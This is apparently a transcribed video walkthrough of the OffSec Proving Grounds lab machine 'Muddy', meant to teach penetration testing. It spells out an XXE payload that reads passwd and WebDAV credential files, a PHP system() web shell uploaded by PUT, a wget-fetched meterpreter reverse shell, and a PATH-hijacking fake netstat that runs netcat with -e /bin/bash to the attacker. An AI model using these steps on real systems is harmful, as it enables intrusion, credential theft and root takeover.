Alright guys, long time no see. Welcome back to Tech Tanks. I know it's been a while since I've been able to make a video. I do apologize. Things have been a little crazy for a while, but hopefully things have settled down enough. I could start bringing things out consistently. I'm hoping for at least once every 2 weeks, but hopefully weekly I could bring out at least one new video. Just covering various materials, information on the CEH, or perhaps just explaining various vulnerabilities and exploitation types out there. I have considered making contact for like the ECPPT or EWPT or any of those other ones, that are out there. If that's something you'd be interested in, feel free to always leave a comment, and be more than happy to look into that for you. I am recording on a new system, and I'm not just talking about the operating system, which we'll get into in just a moment here. But I'm hoping that this will resolve some of the issues that have come up for some people where they had a difficult time reading the screens and things like that. So this is a lower resolution. Instead of running my 4K, this is run at 1080, so it should be a little bit more YouTube friendly. With that being said, if there's any issues, please leave a comment. I'll try to get that resolved as for the next video, and gonna go from there. But anyway. Today's exploits are going to be on we're going to be hacking into a web application, and we're actually going to exploit an XML external entity vulnerability, or injection vulnerability, I should say, and that is going to give us access to additional parts of the web server, which is going to result in us popping a shell. And then we're going to go ahead and take advantage of a scheduled task with a simple vulnerability involved, kind of going back to the basics on that one. And yeah, so we're going to go ahead and get started here. As far as for my operating system of choice today, this is actually inspired by a former colleague of mine. And while I was helping him learn some basic pen testing skills, he had asked if Kali Linux is the only operating system you can hack on. Of course, the answer is no. There's, of course, Parrot OS and some other variations out there with Linux. And also, I can't remember the group. It's just kind of blank from my mind right now. But there is a group who created a PowerShell script to make a commando VM for Windows. However, this is actually a system that I have set up on my own. It's nothing special by any means, but all I wanted to get at was you do not have to use Commando VM to have a pretty solid Windows hacking system. So this is no special variations. I just downloaded tools, made sure I had the right stuff. Currently, my environmental variables, are not set up on my for all my tools and all that. Mostly because I just don't care enough to worry about it. I actually don't mind putting in the full file paths and all that. So you are able to get this set up to where you could just type in the tool's name and it executes without an issue if you so choose. I just haven't gotten around to it because, again, I just don't care. So anyway, I'm going to be doing today's hack with a basic Windows 10 system. As a matter of fact, I believe this is actually even a student edition, if I remember correctly. But yeah, we're going to go ahead and take advantage of this and have a little bit of fun with it. So today's system is going to be on OffSec's Proving Grounds. It's called Muddy, I believe. Pretty sure. Yeah, it's called Muddy. So we're going to go ahead and get this going. As always, we start off with our Nmap Scan, which I did already run using Nmap, which is the GUI version. And I have the output, well, obviously right there in a text file. So if we go ahead and check that, Nmap results. This was a standard scan that I do. You've seen it many, many times before. I did the scripts version, specified ports, told it to output normal to here. And then, yeah, good stuff, good stuff. So, anywho's we do have SSH open on port 22. We have SMTP, for those of you who don't know, that is Simple Mail Transfer Protocol on port 25. HTTP running on port 80. RPC bind on 111. 443 is running who knows what. 808, 908 running who knows what, and then 8888 is running HTTP, and it looks like it's utilizing Python. So naturally, we're going to start with port 80, and more likely than not, we're going to end up jumping over to port 8888, and we'll just kind of take it from there. So let's get this show on the road. So we're going to go ahead and type in the HTTP 192.168.100.161 and go. Or not. Now, this is something where it is automatically filling in the host name. So what that tells us is we need to go ahead and update our Etsy host file. If you are on Linux, that's as simple as opening your Vim and doing Etsy hosts. I am not on Linux, so I'm going to go over here and I'm actually just going to open up my notepad as the admin. Remember, you do need administrator privileges either on Linux or on Windows in order to edit this file. So I'm going to go ahead and open. And if you're on Windows like me, or if you're just morbidly curious, the Etsy host file is located at the C drive or whatever. I mean, that's the default system drive, but whatever that is for you, then the Windows System32 drivers, Etsy directories, and then if you go to all files, you will find the host file. From here, go ahead and just do your 192, whatever your IP address is for the system. Then it's going to be money.ugc. Yep. So then we're going to go ahead and save that file. I'll be honest, guys, it's been a day when it comes to typing. Pretty bad. I had to retype an email earlier like 15 different times, so pretty fun. All right, so should be good. And then if you just go back to your browser and refresh, sweet. All right, and looking at this, always check your buttons as you're going through. So when I make a reference saying that something is a dead link, it basically will just bring you back to the top of the page, right? And if you look on the bottom left of the screen there, you should be able to see the muddy.ugc/pound symbol. And that is how you know it is a dead thing. So let's go ahead and check the next one, same thing. Check the next one, same thing. Nothing relevant here, just the basic filler text. Nope. That will open up a telephone application. Yep, your mail application. Dead. But this is WordPress. All right, so none of those are working. Let's check out the search. Okay, it does give us a parameter, which is S, so that's something to just kind of keep in mind. Might need that later. We have a recent post of Hello World. No user listed. Man, logins are good, unless it doesn't work. Cool. All right, so there's really not a whole lot more that we're going to be able to get out of this as is. So the best thing to do is let's start a directory brute force on this thing and move on to port 8888 and see if we can find everything there. So to do that, we're going to go ahead and we're going to just use PowerShell since I got that one right here. We're going to do Python, and this is located in the users tools directory, dir search.py, http. Oh boy. See, it's not going well. Muddy.ugc. Word list is going to be, no, that was right. Users at word lists. We have the dirbuster. So this should be a pretty default list on Linux. So you should be able to follow along with no problems. HTML, text, we'll search that. Just to clarify, this BAK and old, these are not uncommon extensions for old files. So if somebody replaces, we'll say like the robots.txt file, it's not uncommon to see robot.txt.old or robot.txt.bak. I usually just call that like bak. I don't know why, but it's good. Anyway, so I always like to search those just in case a file like that comes up, but we're going to go ahead and send this on its way and let it do its thing. We'll come back to that in a little bit. So in the meantime, what we're going to do is search port 8888, which this is holding a Ladon, whatever, powered by Ladon for Python. So it's a service catalog. It presents the services exposed by on this particular site. And click on a service name to examine which methods and interfaces expose. I want to see that. So we got a checkout method, which cool. Interfaces, XML RPC, JSON RPC 10, JSON WSP, SOAP, document literal, SOAP 11, and SOAP. Okay, so obviously XML is on here based on that. And before we get too far into clicking on links and things like that, probably should look into exploits. Exploit DB on the top. That's my fave. All right. Eventually it'll load up. In the meantime, I'm going to drink some coffee. Okay. Oh, look at that. It was waiting for me to do it. All right. So let's see. We have a XML external entity expansion. Latest web servers can exploit an XML external expansion, entity expansion, vulnerability, and read local files. Forward server-side requests, or overload the service with exponentially growing memory payloads. So it looks like this actually can turn into a denial of service, read local files, or be able to, as I said there, forward server-side requests. So that's kind of cool. All right, so details, vendor, don't need that. Internet service protocols. Once method is latenized, it is automatically served through all the interfaces. Blah blah blah. Cool. Okay. Following command. So we'll trigger the function. Okay, so this is just showing that right here that they made a little service, hosted it. They put this through to trigger the function that they had put in. They got the response. So they're just showing that it's a functioning thing at this point. Now this is the proof of concept. Basically, they're going to make a new entity. Doc type allows them to reference outside of the immediate vicinity of the XML file. And then put this through, and they get the etc password. Okay, so what we're going to go ahead and do here, I'm going to use Burp Suite. I do have curl on the system, but it's one drawback if you decide to use Windows. I'm going to be upfront with you. This is I've never seen an exploit written for Windows to use, if that makes sense. Privilege escalation, sure, but as far as for like an actual like this curl request, if I put this into the command line, it's going to fail because this is not how you continue a line on Windows, right? This is how you continue a line on Linux. So moving it over to Burp Suite will just kind of give me a little more control over what I'm putting in, right? I'm gonna go ahead and just copy this part, and I'll explain this as I go through it, why I'm only copying this part. But hold on. First, we are going to be using this exploit, but Notice right here it says SOAP 11. So we got SOAP 11 wants something to be posted, which this is putting through a post request. So this works. So we're going to go ahead and just snag a request from here. So it will be a GET request, which is, well, obviously not a post request, but we'll make it work. So we're going to just do Control R, get rid of inspector. I don't know why that keeps popping up on its own. It didn't used to. Anyway. Okay. So, you know what? It actually updated like this morning. So maybe that's what's causing it. Anyway, we're going to change the request method. So now just change it to a post. And then we're going to go ahead and paste what we copied down from the page. All right. Now, obviously, we're going to have to alter this up a little bit because we are not targeting. You guys see that very well. These are options. Let me go ahead and I'm going to make this a little bit better. You guys might be able to read it just fine, but I don't want you guys to have any issues here. So let's bump it to 15. That'd be enough. If that's not enough, go get glasses. Anyway, that's kind of a rude thing to say. All right, so we're going to need to alter this because obviously we're not targeting the hello service. We are obviously not targeting the say hello function, right? And then also, in my case specifically, I need to get rid of these escapes that they're doing on all the quotations, which there are quite a few, sadly. Okay, so if you are running this in Bash, you need to escape these quotes, or it's going to it's not going to run like it should, right? In my case, I'm not running it in Bash, so I don't want to escape these. I want them to work as they're supposed to. So, and if you're not familiar with the meaning of escaping, it's more common in programming that you'll hear talked about. But basically, a quotation mark is designed to designate a string or what have you. If you need the quotation mark to actually be in said string, then you need to go ahead and escape it. So that tells the compiler that it's good to use that type thing. So we're going to go ahead and do that. So I escaped everything. All right. The service is muddy, right? Which we know that because it's right there. So there you go. So the service is muddy. This is the function, which, if you recall, is checkout. All right. Oh boy. There we go. Checkout. All right. So we updated that, and checkout. Yep. All right. Now there were two headers on the request. Right. Content type. We need it to be this. So I'm going to just go ahead and copy, and I'll just replace it that way. Content type. Bam. And then there was one more header that is not one that we have on here, which is SOAP action. And it's doing the HTTP muddy.ugc 8888 muddy SOAP 11. And then it also included the function call, if I recall correctly. Yeah. Cool. So what this should be doing, let's go ahead and kind of talk about what's going on here, right? So an XXE, or an external, an XML external entity injection, is basically what causes it. These use APIs in the background, and they're used to process the XML data on the server. So when you exploit an XXE vulnerability, or they happen because the XML what's the word, specification, I guess, it has different function calls and things like that end up allowing external or other entities to be referenced or even created inside of any XML requests that are being put through. So in this case, we're able to create a new one, which we're calling password, right? And that's right here, right? We're able to make that new one and reference it here with the ampersand symbol. And basically it's taking this string, which was, for checkout, right? If you recall from the function, it is, let's see if we can find it here. If you recall from that function, it takes the string and it returns the string. That's all it does, right? And so what we're doing is we're basically putting our new entity that we created inside of that string, and we're having it put back out, right? And then we use the doc type right here. Basically, that allows us to reference outside of the norms that are set, right? So in this case, we're going to the XXE password file, right? So if we send this, I never plan on these working the first time. There's always a typo or something. But if we send this, all right, sweet. We now have the XXE password file, right? Now, if we look at this, we notice that there's a home Ian. So we have an Ian directory. Let's see if there's any other home directories in there. Nope, just one. Okay, so we have Ian and root. Those are our two users, right? And then, of course, there's probably the www-data user. But we have those two users. So we can use this to access various files on the system. Now, I'm going to assume we're the www-data user. So it's whatever we have access to. So I'm going to go ahead and try the home Ian .ssh ID RSA, right? Because that makes sense. No good. All right. So one thing to keep in mind is at this point, it becomes a guessing game of what files will be available that we can utilize, right? Now, one thing that would be helpful is seeing if there's anything over here that is relevant, which there now is, right? We have Webdav right here. So what Webdav is it is basically a tool put in place that allows people to sign in and alter files on the web server from the browser. Is the best way that I can explain it, at least on a quick level. So this usually requires authentication, right? So if I were to go here, get rid of this part, and just do Webdav, right? And let's make sure we have our HTTP. Yeah, so they want authentication. Now, that means there's a place where this is authenticating from, right? So let's see if we can find that, because it's got to have a way where it's checking for files. So we're going to be in the var dub, and then let's try password.dav. No. Okay. HTML. No. Okay. Webdav. And now we have something. All right. Now, some of you may be asking, like, well, how did you know about the password.dav? Well, the answer to that is actually pretty simple. I mean, not to sound like a dick or anything, but if you just search file, you put that, oh, dang it. If you just put, the password.dav and then search file, what you'll find, and this is just from experience, user password stored, authentication file, right? So it's not always called password.dav, right? Unfortunately, it does have different names that can come up. So part of this was just trial and error on this particular thing. So if we do like webdav password file, so this says, I'm down to randomly click on websites. It's a good time. Webdav, yep. So like in this case, saying users.password, right? So that's the file they're using. So like I said, different things to try, but it was basically a trial and error is what it comes down to, if I'm being bluntly honest. But password.dav is one that I have seen be used. Now, what we end up having here at this point is, it looks like a username and a password hash. So let's go ahead and notepad hash.txt. Yes, create it, save it, close it. So we're going to use our dear friend John. Let's see, tools, John, run, john.exe, and hash.text. Wordless. Cool, that was fast. So we now have, hopefully, a password and a username for that application, right? So it was administrant, then sleepless. Yeah, okay. Yeah. Apparently I didn't revert the system from when I did this earlier. Walking somebody else through it. I was like, I'm going to make a video. So, all right, my bad. That's all right. We'll go ahead and we'll just make a fresh one. All right. So, anywho, we are now on this this page. Now, one of the first things I want to do is understand what can I do on it, right? It's WebDav. Some good stuff here. So I'm going to go ahead and just basically catch a request, send it over to the repeater, and from here I'm actually going to just type out options. And I'm going to send it. Right now, what this does is this tells me what is allowed on the server on this particular page. It's also taking into account my authentication. And I mean, I got options out the wazoo here, but one that I don't see is put, right? But I do have copy. I have move. So I'm going to try put because why not, right? So the way that a put is done is you put it in here for your request type, then you got to give it a file name. So I'm going to go ahead and we'll just put okay without the capitalize owned.php. And then we got to put the contents of the file, right? So we're going to go ahead and do php echo system, that, and that request cmd, that. Okay, so basically, just to kind of give you the structure of how this is working, we are doing a put request, which is basically, hey, put this in this directory as this file, right? So owned.php is not here, right? But we're saying make this file in this directory, which is where we're currently at. And here's the contents of the file, right? It's whatever you put down here. So we're just doing a basic PHP echo with a system function. And we're going to go ahead and send that. And we got a 201 saying that it has been created. And here's the resource. So first of all, if we go back to our web browser, we just hit refresh. All right, we now have owned.php. Now you can access that straight from the web page, or you can go ahead and just do it right here and change this to a GET request. Do a who am I? Nope. Oh man, CMD equals who am I? Okay, then we're gonna go ahead and send it. And Yahtzee, we got an answer, right? Now from here, upload a shell and everything else, but I'm gonna go ahead and make sure that I don't have a shell on there anymore. So I'm gonna go ahead and just do an RM. I'm gonna want to change this. Let's see, temp shell.elf. Just make sure that's gone, so that way we can just start fresh. Okay, so do I have? Okay, so I at least cleared out my files here. So we're gonna go ahead and make a directory. Apparently we're gonna make it 4 W's, but nah, you know what, I'm gonna make dir dub. There we go. Okay. We're gonna do an MSF Venom. Now we need to find out what it is we're working with. So one trick you could do if you're working in Burp, if you're like me and you just don't want to keep doing the plus sign and all that nonsense, if you right click, you can do your own code as you type. And now I can just do uname space -a. it does all that. Whoops. It does all that other stuff for me. Like in this case, it's just doing the plus sign, which doesn't sound like a lot, but that adds up. So it's a 64 architecture. So x64 p Linux x64. We're going to just run this in interpreter because why not? Reverse TCP. Host is going to equal 192.168.49.100. Seems about right to me. Port 44444. Elf shell.elf. I feel like a total idiot if that's not what it is. So we're going to go ahead and just kind of cancel out of this. IP config. Yeah, okay, got that part. 49100. Yeah, cool. So MSF console. We're going to get that running. We're going to go ahead and send that. All right. So at this point, all we're doing is we're going to load a shell onto the server. Now, there are, we could just, of course, run a, get like the PHP script from Pentest Monkey and just put it on there. Do it that way. There's nothing wrong with that. But I'm going to go ahead and load up a interpreter shell. Okay, so that's just my preference. All right, we got that. We're going to use multi-handler set payload. Oops. Linux x64 interpreter versus TCP set L host 192.168.49.100 and set L port 4444 and run. Sweet, it's running. Okay, and then we come back over here, and we're just going to go through that whole fun process of wget HTTP 192.168.49.100 shell.elf, output it to temp shell.elf and sending. Okay, and then we just chmod this because we need to make sure we have executable privileges. Chmod 777, which if you don't know what that is the numerical representation of the privileges, 7 being the combination of all 3, read, write, and execute. So we're just saying everybody can read, write, and execute on this thing because it doesn't matter. Then we're going to go ahead and send it. We're not going to get any output back other than done. And then if we just do temp shell.elf, this should pop a shell. Yep. All right, cool. So if we do a shell, do a who am I, or the www-data user. Now we do know that Python is loaded on here, so should be no problems doing this. Perfect. Okay. So there you go, guys. We went ahead and exploited a XML external entity injection. And that allowed us to read a file, which led us to being able to find a password, which led us to being able to get into the Webdav, which led us to being able to upload any kind of really, it basically allowed us to get RCE on the system, right? Remote code execution, because we were able to upload the PHP with the simple system function with the get request, and that's what kind of allowed us to kind of be where we're at right now. On here, there's a lot of different options on where to start. I always start, other than the sudo privileges, which I'm not going to waste my time because I already know there's no sudo privileges. I'm going to go ahead and do a find perm us type f to to dev null, right? So what this is basically doing, guys, is it's searching for it's starting to search from the root directory. It's looking for the permissions where the user has sudo privileges, and it's a file, right? Not a directory or anything else. It's a file. These are the ones that pop up, but unfortunately, none of those are going to be really worth our while. So next step that I like to do, and this is going to seem a little silly, but I like to check the password file, the permissions on it. Oh, whoops. Let's see, grep password. All right. The reason why I like to do that is I can't tell you how many systems I searched for very long time, a ridiculous amount of time to find out I had write permissions to the password file. Right, now you can actually use kind of the same setup that we did with when we were searching for the SUID files right here. You can search for writable files, but you may find that is going to be a very, very long list. So I just like to check that one quick, fast, and in a hurry. All right. Next, we check for cron. Right now, if you don't know what cron is, like cron jobs and cron tab and all that fun stuff, that is Linux's equivalent to schedule tasks for Windows. That's all that one is. So I'm going to go ahead and read the cron tab, and it kind of explains what goes on here, right? So the first digit that you find is for minute, hour, day of the month, and of course day of the week, right? And it gives the explanations on the side here. But it also lists if there's any specific tasks that are set to go, right? And right here, when you see all these asterisks, that means it literally runs every single minute. So every minute, root is running Netstat, okay, along with service Apache 2 status, and it looks like it's feeding it into a root. In the root directory, there's a status file, and it's just kind of feeding this information right into it. Relevant piece of information is right here, which is the path. Okay. Now, if you're not familiar with what the path is, every operating system has a path variable, right? You have your system path variable, and then you also have your individual user path variables. Sorry. These paths basically dictate where does the system look for the command you're issuing, right? So if you don't have the correct path already enabled, like what you've seen with my Windows system, right? When I was running John, JTR, John the Ripper, I had to go to the C drive, to the users directory, inside of the OffSec directory, inside of the tools directory, inside of the John directory, inside of the run directory, and then I could finally execute John. Why? Because I don't have all that in my path variable to say, hey, if I type out the word John, you're looking, this is a place you can look for it as well, right? So I have to do the fully qualified path to execute it. So this is kind of a shortcut on doing the fully qualified path. So there's a few steps to take here. The first step, it's calling Netstat, right, which is an ELF file, which is a Linux executable. I want to know which Netstat, right? What one are you going to run? And it's user bin Netstat. Now there's two things to check here. The first one is, do I have write permissions to Netstat? No, I do not. Root does. Okay. The next step is, do I have write permissions to the bin directory? No, I do not. Okay. So overwriting Netstat directly is not going to happen. But I can still exploit the path, potentially. And when you look at the path, it starts from the left and goes to the right. So we want to check each one of these directories and see where we have permissions, right? We want to start with this one first. So if I do ls-lad and do dev shm, I have, everybody has read, write, execute privileges on the directory. So I'm going to go ahead and check that out and just make sure I saw that correctly. I did see that correctly. So I can read and write here. Okay. So we're going to go ahead and try to overwrite which Netstat is being ran by going further ahead in the path. All right. So we're going to go ahead and do a echo. And I just like to be thorough with this. So I'm going to start it off with a bin bash. And we're going to feed that into a file called netstat. Right. So now if we check the directory, we have a netstat in there. Whereas before it was, oh, I think that was from before. Okay, well, now you can see that the file size has changed, right? So there you go, we're making a new one. And then we're going to go ahead and echo again. You know what, I'm going to make sure that nothing carries over. Let me go ahead and just remove it. All right, now we're going to start fresh here. Now, the reason why I did that is I want to make sure we don't skip a step here. Notice that nobody has execute privileges on this file, right? So we're gonna fix that in a moment, but I wanted to make sure that I wasn't a step ahead of you and you didn't even know. So and then we're gonna go ahead and we have to find some kind of executable, right? Now we can actually just put in a reverse shell on there, but there's another option, and I don't want to forget about taking advantage of the tools that are already on the system, right? So we can do an echo nc nv 192.168.49.100 e bin bash, right? So what this is telling it is netcat, go ahead and connect to and verbose to 192.168.49.100 at port 1234 and execute this file bin bash, right, which gives us a shell. And then we're going to go ahead and append it, right? So that's why we're doing the double symbols. We're going to append it to the netstat file, right? So if we cat netstat now, which is the one inside of our same directory, that's what it says. Now we're going to go ahead and chmod plus x to netstat. And then we're going to want to make sure that we are ready to catch it. nc nlvp 1234 invalid what? nc nlvp 1234. There we go. Okay. So now what we do is we're going to wait for it to execute the netstat command, which should be less than a minute, right? All depends on when we hit on it, but a minute is kind of the max time. So while we're waiting, basically all this is doing is it's injecting, we're injecting ourselves further ahead inside of the command call, right? So it's just saying, hey, netstat, and then Linux is like, oh, okay, well, I can find netstat, and then it starts searching from left to right through that those set of directories to locate it. We went ahead and took the first one because we had write privileges, and we was like, oh, here's netstat, right? So you could still run the standard netstat command, but now you have to give it the fully qualified name, or it's going to default to the closest one that it finds, right? So now we are the root user because root's the one running this. So Python C import putty, oh boy, putty.spawn bin bash. Okay, so that's how it's done, guys. Glad I could help you with that. I didn't put the R here, that's just silly. So one thing I did want to show you before we wrap it up, just real quick, a couple things actually real quick. So obviously the root flag is going to be right here in the root directory. The other one, just so you are aware, is here. Okay, the var www directory, which is actually the home directory for the www-data user. Okay, so if you just, while you're the www-data user, if you go to your home directory, it'll be right there. The other thing that I wanted to show you is, actually, I don't even have to exit that. We're going to go back to here. So we're still the www-data user. Again, going to the home directory, there's your local text. But if I were to run, if I were to just do netstat, it would try to run the, actually, no, in my case it won't, never mind. Because my path doesn't include that, right? That was for that particular path. So if I run netstat, it still runs the actual netstat binary because my path doesn't include the dev shm, right? That was the path specifically for the cron tab. So keep that in mind. There can be multiple paths at play here. Okay, so happy hacking, guys. I'll try to have another video up in the next couple weeks. All right, have a good one.